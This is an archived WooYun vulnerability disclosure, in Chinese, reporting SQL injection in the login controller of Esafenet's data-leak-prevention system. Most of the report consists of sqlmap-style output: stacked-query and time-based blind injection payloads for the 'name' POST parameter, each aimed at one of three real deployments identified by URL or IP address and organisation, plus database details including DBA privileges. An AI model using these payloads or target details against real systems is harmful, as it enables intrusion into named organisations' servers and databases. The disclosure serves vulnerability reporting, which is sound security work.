当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044268

漏洞标题:亿赛通数据泄露防护(DLP)系统注入漏洞

相关厂商:esafenet.com

漏洞作者: Vigoss_Z

提交时间:2013-11-28 09:18

修复时间:2013-12-03 09:19

公开时间:2013-12-03 09:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-28: 细节已通知厂商并且等待厂商处理中
2013-12-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt.

详细说明:

https://jm.jtyjy.com:8443/CDGServer3/logincontroller V3.8.3.1.130427_R
授权用户:江西金太阳教育集团
版本启用时间:2013-06-18 10:20:44

POST
Parameter: name
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: command=Login&forward=frame.jsp&verifyCodeDigit=dfd&name=tNpb'; WAITFOR DELAY '0:0:15'--&pass=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: command=Login&forward=frame.jsp&verifyCodeDigit=dfd&name=tNpb' WAITFOR DELAY '0:0:15'--&pass=
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005


https://esafe.jsptpd.com:8443 V3.8.1.2.110616_R
授权用户:江苏省邮电规划设计院有限责任公司(主页被挂黑页)
版本启用时间:2013-11-25 10:43:41

POST
Parameter: name
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: command=Login&forward=frame.jsp&verifyCodeDigit=dfd&name=pjUD'; WAITFOR DELAY '0:0:15'--&pass=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: command=Login&forward=frame.jsp&verifyCodeDigit=dfd&name=pjUD' WAITFOR DELAY '0:0:15'--&pass=
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005


https://61.141.236.16:8443 V300R008C01SPH530
版本启用时间:2013-08-02 09:26:16
授权用户:esafenet(自己用的?)

POST
Parameter: name
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: command=Login&forward=frame.jsp&verifyCodeDigit=dfd&name=LDjh'; WAITFOR DELAY '0:0:15'--&pass=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: command=Login&forward=frame.jsp&verifyCodeDigit=dfd&name=LDjh' WAITFOR DELAY '0:0:15'--&pass=
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True

漏洞证明:

修复方案:

版权声明:转载请注明来源 Vigoss_Z@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-03 09:19

厂商回复:

最新状态:

暂无